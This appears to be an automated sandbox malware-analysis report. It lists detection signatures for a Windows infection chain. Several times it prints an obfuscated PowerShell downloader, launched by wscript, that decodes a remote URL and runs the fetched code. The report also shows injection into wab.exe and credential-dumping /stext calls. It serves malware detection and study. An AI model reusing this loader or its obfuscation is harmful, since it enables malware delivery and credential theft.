Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C8EC8 LdrInitializeThunk, 8_2_240C8EC8
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_240C60E2
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 11_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 11_2_004044A4
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C4AB4 mov eax, dword ptr fs:[00000030h] 8_2_240C4AB4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C724E GetProcessHeap, 8_2_240C724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_240C60E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_240C2639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_240C2B1C

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_3528.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3528, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1084, type: MEMORYSTR
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3CE0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A7F808 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sreml
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sreml
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sreml Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sreml Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C2933 cpuid 8_2_240C2933
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
